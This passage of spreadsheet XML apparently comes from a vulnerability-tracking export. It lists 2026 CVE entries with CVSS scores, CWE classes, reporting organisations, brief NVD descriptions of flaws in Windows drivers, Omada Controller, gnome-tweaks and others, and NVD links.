/><c r="R1028" s="5" t="inlineStr"><is><t>CWE-203</t></is></c><c r="S1028" s="5" t="inlineStr"><is><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is></c><c r="T1028" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-53933</t></is></c></row><row r="1029"><c r="A1029" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1029" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1029" s="5" t="inlineStr"><is><t>CVE-2026-62652</t></is></c><c r="D1029" s="5" t="n"><v>6.9</v></c><c r="E1029" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1029" s="5" t="inlineStr"><is><t>productcert@siemens.com</t></is></c><c r="G1029" s="5" t="inlineStr" /><c r="H1029" s="5" t="n"><v>0.002</v></c><c r="I1029" s="5" t="inlineStr" /><c r="J1029" s="5" t="inlineStr" /><c r="K1029" s="5" t="inlineStr" /><c r="L1029" s="5" t="inlineStr" /><c r="M1029" s="5" t="inlineStr" /><c r="N1029" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1029" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1029" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1029" s="5" t="inlineStr" /><c r="R1029" s="5" t="inlineStr"><is><t>CWE-215</t></is></c><c r="S1029" s="5" t="inlineStr"><is><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is></c><c r="T1029" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62652</t></is></c></row><row r="1030"><c r="A1030" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1030" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1030" s="5" t="inlineStr"><is><t>CVE-2026-81531</t></is></c><c r="D1030" s="5" t="n"><v>6.9</v></c><c r="E1030" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1030" s="5" t="inlineStr"><is><t>f23511db-6c3e-4e32-a477-6aa17d310630</t></is></c><c r="G1030" s="5" t="inlineStr" /><c r="H1030" s="5" t="n"><v>0.004</v></c><c r="I1030" s="5" t="inlineStr" /><c r="J1030" s="5" t="inlineStr" /><c r="K1030" s="5" t="inlineStr" /><c r="L1030" s="5" t="inlineStr" /><c r="M1030" s="5" t="inlineStr" /><c r="N1030" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1030" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1030" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1030" s="5" t="inlineStr" /><c r="R1030" s="5" t="inlineStr"><is><t>CWE-200</t></is></c><c r="S1030" s="5" t="inlineStr"><is><t>An information
disclosure vulnerability has been identified in Omada Controller.  An API endpoint intended for Controller initialization
remains accessible after completion and may disclose account-related
information to unauthenticated remote users. 






Successful
exploitation may allow an attacker to remote query the affected endpoint that
may facilitate user enumeration and subsequent attacks targeting administrative
accounts.</t></is></c><c r="T1030" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81531</t></is></c></row><row r="1031"><c r="A1031" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1031" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1031" s="5" t="inlineStr"><is><t>CVE-2026-81823</t></is></c><c r="D1031" s="5" t="n"><v>6.9</v></c><c r="E1031" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1031" s="5" t="inlineStr"><is><t>ics-cert@hq.dhs.gov</t></is></c><c r="G1031" s="5" t="inlineStr" /><c r="H1031" s="5" t="n"><v>0.002</v></c><c r="I1031" s="5" t="inlineStr" /><c r="J1031" s="5" t="inlineStr" /><c r="K1031" s="5" t="inlineStr" /><c r="L1031" s="5" t="inlineStr" /><c r="M1031" s="5" t="inlineStr" /><c r="N1031" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1031" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1031" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q1031" s="5" t="inlineStr" /><c r="R1031" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S1031" s="5" t="inlineStr"><is><t>The vulnerability, if exploited, could allow an unauthenticated miscreant to perform read operations intended only for PIMBoards users, resulting in information disclosure. Write operations are not impacted.</t></is></c><c r="T1031" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81823</t></is></c></row><row r="1032"><c r="A1032" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1032" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1032" s="5" t="inlineStr"><is><t>CVE-2026-86804</t></is></c><c r="D1032" s="5" t="n"><v>6.9</v></c><c r="E1032" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1032" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1032" s="5" t="inlineStr" /><c r="H1032" s="5" t="n"><v>0.004</v></c><c r="I1032" s="5" t="inlineStr" /><c r="J1032" s="5" t="inlineStr" /><c r="K1032" s="5" t="inlineStr" /><c r="L1032" s="5" t="inlineStr" /><c r="M1032" s="5" t="inlineStr" /><c r="N1032" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1032" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1032" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1032" s="5" t="inlineStr" /><c r="R1032" s="5" t="inlineStr"><is><t>CWE-266, CWE-285</t></is></c><c r="S1032" s="5" t="inlineStr"><is><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is></c><c r="T1032" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86804</t></is></c></row><row r="1033"><c r="A1033" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1033" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1033" s="5" t="inlineStr"><is><t>CVE-2026-86810</t></is></c><c r="D1033" s="5" t="n"><v>6.9</v></c><c r="E1033" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1033" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1033" s="5" t="inlineStr" /><c r="H1033" s="5" t="n"><v>0.007</v></c><c r="I1033" s="5" t="inlineStr" /><c r="J1033" s="5" t="inlineStr" /><c r="K1033" s="5" t="inlineStr" /><c r="L1033" s="5" t="inlineStr" /><c r="M1033" s="5" t="inlineStr" /><c r="N1033" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1033" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1033" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1033" s="5" t="inlineStr" /><c r="R1033" s="5" t="inlineStr"><is><t>CWE-287</t></is></c><c r="S1033" s="5" t="inlineStr"><is><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is></c><c r="T1033" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86810</t></is></c></row><row r="1034"><c r="A1034" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1034" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1034" s="5" t="inlineStr"><is><t>CVE-2026-65812</t></is></c><c r="D1034" s="5" t="n"><v>6.8</v></c><c r="E1034" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1034" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1034" s="5" t="inlineStr" /><c r="H1034" s="5" t="n"><v>0.005</v></c><c r="I1034" s="5" t="inlineStr" /><c r="J1034" s="5" t="inlineStr" /><c r="K1034" s="5" t="inlineStr" /><c r="L1034" s="5" t="inlineStr" /><c r="M1034" s="5" t="inlineStr" /><c r="N1034" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1034" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1034" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1034" s="5" t="inlineStr" /><c r="R1034" s="5" t="inlineStr"><is><t>CWE-201</t></is></c><c r="S1034" s="5" t="inlineStr"><is><t>Insertion of sensitive information into sent data in Microsoft Teams for Android allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1034" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-65812</t></is></c></row><row r="1035"><c r="A1035" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1035" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1035" s="5" t="inlineStr"><is><t>CVE-2026-68833</t></is></c><c r="D1035" s="5" t="n"><v>6.8</v></c><c r="E1035" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1035" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1035" s="5" t="inlineStr" /><c r="H1035" s="5" t="n"><v>0.003</v></c><c r="I1035" s="5" t="inlineStr" /><c r="J1035" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K103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5" s="5" t="inlineStr" /><c r="M1035" s="5" t="inlineStr" /><c r="N1035" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1035" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1035" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q1035" s="5" t="inlineStr" /><c r="R1035" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S1035" s="5" t="inlineStr"><is><t>Heap-based</t></is></c><c r="T1035" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68833</t></is></c></row><row r="1036"><c r="A1036" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1036" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1036" s="5" t="inlineStr"><is><t>CVE-2026-69415</t></is></c><c r="D1036" s="5" t="n"><v>6.8</v></c><c r="E1036" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1036" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1036" s="5" t="inlineStr" /><c r="H1036" s="5" t="n"><v>0.007</v></c><c r="I1036" s="5" t="inlineStr" /><c r="J1036" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1036" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1036" s="5" t="inlineStr" /><c r="M1036" s="5" t="inlineStr" /><c r="N1036" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1036" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1036" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1036" s="5" t="inlineStr" /><c r="R1036" s="5" t="inlineStr"><is><t>CWE-306</t></is></c><c r="S1036" s="5" t="inlineStr"><is><t>Missing authentication for critical function in Windows DHCP Server allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T1036" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69415</t></is></c></row><row r="1037"><c r="A1037" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1037" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1037" s="5" t="inlineStr"><is><t>CVE-2026-69490</t></is></c><c r="D1037" s="5" t="n"><v>6.8</v></c><c r="E1037" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1037" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1037" s="5" t="inlineStr" /><c r="H1037" s="5" t="n"><v>0.004</v></c><c r="I1037" s="5" t="inlineStr" /><c r="J1037" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K10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7" s="5" t="inlineStr" /><c r="M1037" s="5" t="inlineStr" /><c r="N1037" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1037" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1037" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1037" s="5" t="inlineStr" /><c r="R1037" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1037" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows USB Mass Storage Class Driver allows an unauthorized attacker to elevate privileges with a physical attack.</t></is></c><c r="T1037" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69490</t></is></c></row><row r="1038"><c r="A1038" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1038" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1038" s="5" t="inlineStr"><is><t>CVE-2026-69566</t></is></c><c r="D1038" s="5" t="n"><v>6.8</v></c><c r="E1038" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1038" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1038" s="5" t="inlineStr" /><c r="H1038" s="5" t="n"><v>0.004</v></c><c r="I1038" s="5" t="inlineStr" /><c r="J1038" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K10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8" s="5" t="inlineStr" /><c r="M1038" s="5" t="inlineStr" /><c r="N1038" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1038" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1038" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q1038" s="5" t="inlineStr" /><c r="R1038" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S1038" s="5" t="inlineStr"><is><t>Heap-based</t></is></c><c r="T1038" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69566</t></is></c></row><row r="1039"><c r="A1039" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1039" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1039" s="5" t="inlineStr"><is><t>CVE-2026-71329</t></is></c><c r="D1039" s="5" t="n"><v>6.8</v></c><c r="E1039" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1039" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1039" s="5" t="inlineStr" /><c r="H1039" s="5" t="n"><v>0.003</v></c><c r="I1039" s="5" t="inlineStr" /><c r="J1039" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K103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9" s="5" t="inlineStr" /><c r="M1039" s="5" t="inlineStr" /><c r="N1039" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1039" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1039" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1039" s="5" t="inlineStr" /><c r="R1039" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S1039" s="5" t="inlineStr"><is><t>Heap-based</t></is></c><c r="T1039" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71329</t></is></c></row><row r="1040"><c r="A1040" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1040" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1040" s="5" t="inlineStr"><is><t>CVE-2026-71348</t></is></c><c r="D1040" s="5" t="n"><v>6.8</v></c><c r="E1040" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1040" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1040" s="5" t="inlineStr" /><c r="H1040" s="5" t="n"><v>0.004</v></c><c r="I1040" s="5" t="inlineStr" /><c r="J1040" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K10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0" s="5" t="inlineStr" /><c r="M1040" s="5" t="inlineStr" /><c r="N1040" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1040" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1040" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1040" s="5" t="inlineStr" /><c r="R1040" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S1040" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Spaceport.sys allows an unauthorized attacker to execute code with a physical attack.</t></is></c><c r="T1040" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71348</t></is></c></row><row r="1041"><c r="A1041" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1041" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1041" s="5" t="inlineStr"><is><t>CVE-2026-71349</t></is></c><c r="D1041" s="5" t="n"><v>6.8</v></c><c r="E1041" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1041" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1041" s="5" t="inlineStr" /><c r="H1041" s="5" t="n"><v>0.004</v></c><c r="I1041" s="5" t="inlineStr" /><c r="J1041" s="5" t="inlineStr" /><c r="K1041" s="5" t="inlineStr" /><c r="L1041" s="5" t="inlineStr" /><c r="M1041" s="5" t="inlineStr" /><c r="N1041" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1041" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1041" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1041" s="5" t="inlineStr" /><c r="R1041" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S1041" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Spaceport.sys allows an unauthorized attacker to execute code with a physical attack.</t></is></c><c r="T1041" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71349</t></is></c></row><row r="1042"><c r="A1042" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1042" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1042" s="5" t="inlineStr"><is><t>CVE-2026-71350</t></is></c><c r="D1042" s="5" t="n"><v>6.8</v></c><c r="E1042" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1042" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1042" s="5" t="inlineStr" /><c r="H1042" s="5" t="n"><v>0.004</v></c><c r="I1042" s="5" t="inlineStr" /><c r="J1042" s="5" t="inlineStr" /><c r="K1042" s="5" t="inlineStr" /><c r="L1042" s="5" t="inlineStr" /><c r="M1042" s="5" t="inlineStr" /><c r="N1042" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1042" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1042" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1042" s="5" t="inlineStr" /><c r="R1042" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S1042" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Spaceport.sys allows an unauthorized attacker to execute code with a physical attack.</t></is></c><c r="T1042" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71350</t></is></c></row><row r="1043"><c r="A1043" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1043" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1043" s="5" t="inlineStr"><is><t>CVE-2026-72985</t></is></c><c r="D1043" s="5" t="n"><v>6.8</v></c><c r="E1043" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1043" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1043" s="5" t="inlineStr" /><c r="H1043" s="5" t="n"><v>0.003</v></c><c r="I1043" s="5" t="inlineStr" /><c r="J1043" s="5" t="inlineStr" /><c r="K1043" s="5" t="inlineStr" /><c r="L1043" s="5" t="inlineStr" /><c r="M1043" s="5" t="inlineStr" /><c r="N1043" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1043" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1043" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1043" s="5" t="inlineStr" /><c r="R1043" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S1043" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Volume Shadow Copy allows an unauthorized attacker to elevate privileges with a physical attack.</t></is></c><c r="T1043" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72985</t></is></c></row><row r="1044"><c r="A1044" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1044" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1044" s="5" t="inlineStr"><is><t>CVE-2026-72999</t></is></c><c r="D1044" s="5" t="n"><v>6.8</v></c><c r="E1044" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1044" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1044" s="5" t="inlineStr" /><c r="H1044" s="5" t="n"><v>0.003</v></c><c r="I1044" s="5" t="inlineStr" /><c r="J1044" s="5" t="inlineStr" /><c r="K1044" s="5" t="inlineStr" /><c r="L1044" s="5" t="inlineStr" /><c r="M1044" s="5" t="inlineStr" /><c r="N1044" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1044" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1044" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1044" s="5" t="inlineStr" /><c r="R1044" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1044" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows USB Hub Driver allows an unauthorized attacker to elevate privileges with a physical attack.</t></is></c><c r="T1044" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72999</t></is></c></row><row r="1045"><c r="A1045" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1045" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1045" s="5" t="inlineStr"><is><t>CVE-2026-74859</t></is></c><c r="D1045" s="5" t="n"><v>6.8</v></c><c r="E1045" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1045" s="5" t="inlineStr"><is><t>secalert@redhat.com</t></is></c><c r="G1045" s="5" t="inlineStr" /><c r="H1045" s="5" t="n"><v>0.001</v></c><c r="I1045" s="5" t="inlineStr" /><c r="J1045" s="5" t="inlineStr" /><c r="K1045" s="5" t="inlineStr" /><c r="L1045" s="5" t="inlineStr" /><c r="M1045" s="5" t="inlineStr" /><c r="N1045" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1045" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1045" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1045" s="5" t="inlineStr" /><c r="R1045" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="S1045" s="5" t="inlineStr"><is><t>The shell theme installer in gnome-tweaks extracts user-supplied ZIP archives without validating archive member paths. As a result, a crafted theme archive can write files outside ~/.themes by using ../ path traversal, absolute paths, or symlink entries.</t></is></c><c r="T1045" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-74859</t></is></c></row><row r="1046"><c r="A1046" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1046" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1046" s="5" t="inlineStr"><is><t>CVE-2026-77892</t></is></c><c r="D1046" s="5" t="n"><v>6.8</v></c><c r="E1046" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1046" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1046" s="5" t="inlineStr" /><c r="H1046" s="5" t="n"><v>0.003</v></c><c r="I1046" s="5" t="inlineStr" /><c r="J1046" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K10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6" s="5" t="inlineStr" /><c r="M1046" s="5" t="inlineStr" /><c r="N1046" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1046" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1046" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1046" s="5" t="inlineStr" /><c r="R1046" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="S1046" s="5" t="inlineStr"><is><t>No cwe for this issue in Windows Boot Manager allows an unauthorized attacker to elevate privileges with a physical attack.</t></is></c><c r="T1046" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77892</t></is></c></row><row r="1047"><c r="A1047" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1047" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1047" s="5" t="inlineStr"><is><t>CVE-2026-78451</t></is></c><c r="D1047" s="5" t="n"><v>6.8</v></c><c r="E1047" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1047" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1047" s="5" t="inlineStr" /><c r="H1047" s="5" t="n"><v>0.004</v></c><c r="I1047" s="5" t="inlineStr" /><c r="J1047" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K104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47" s="5" t="inlineStr" /><c r="M1047" s="5" t="inlineStr" /><c r="N1047" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1047" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1047" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1047" s="5" t="inlineStr" /><c r="R1047" s="5" t="inlineStr"><is><t>CWE-822</t></is></c><c r="S1047" s="5" t="inlineStr"><is><t>Untrusted pointer dereference in Microsoft Windows SCSI Class System File allows an unauthorized attacker to elevate privileges with a physical attack.</t></is></c><c r="T1047" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78451</t></is></c></row><row r="1048"><c r="A1048" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1048" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1048" s="5" t="inlineStr"><is><t>CVE-2026-78579</t></is></c><c r="D1048" s="5" t="n"><v>6.8</v></c><c r="E1048" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1048" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G1048" s="5" t="inlineStr" /><c r="H1048" s="5" t="n"><v>0.002</v></c><c r="I1048" s="5" t="inlineStr" /><c r="J1048" s="5" t="inlineStr"><is><t>okta</t></is></c><c r="K1048" s="5" t="inlineStr" /><c r="L1048" s="5" t="inlineStr" /><c r="M1048" s="5" t="inlineStr" /><c r="N1048" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1048" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1048" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1048" s="5" t="inlineStr" /><c r="R1048" s="5" t="inlineStr"><is><t>CWE-90</t></is></c><c r="S1048" s="5" t="inlineStr"><is><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is></c><c r="T1048" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78579</t></is></c></row><row r="1049"><c r="A1049" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1049" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1049" s="5" t="inlineStr"><is><t>CVE-2026-69350</t></is></c><c r="D1049" s="5" t="n"><v>6.7</v></c><c r="E1049" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1049" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1049" s="5" t="inlineStr" /><c r="H1049" s="5" t="n"><v>0.003</v></c><c r="I1049" s="5" t="inlineStr" /><c r="J1049" s="5" t="inlineStr" /><c r="K1049" s="5" t="inlineStr" /><c r="L1049" s="5" t="inlineStr" /><c r="M1049" s="5" t="inlineStr" /><c r="N1049" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1049" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1049" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1049" s="5" t="inlineStr" /><c r="R1049" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S1049" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Overlay Filter allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1049" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69350</t></is></c></row><row r="1050"><c r="A1050" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1050" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1050" s="5" t="inlineStr"><is><t>CVE-2026-69373</t></is></c><c r="D1050" s="5" t="n"><v>6.7</v></c><c r="E1050" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1050" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1050" s="5" t="inlineStr" /><c r="H1050" s="5" t="n"><v>0.003</v></c><c r="I1050" s="5" t="inlineStr" /><c r="J1050" s="5" t="inlineStr" /><c r="K1050" s="5" t="inlineStr" /><c r="L1050" s="5" t="inlineStr" /><c r="M1050" s="5" t="inlineStr" /><c r="N1050" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1050" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1050" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1050" s="5" t="inlineStr" /><c r="R1050" s="5" t="inlineStr"><is><t>CWE-125, CWE-190</t></is></c><c r="S1050" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Windows Overlay Filter allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1050" 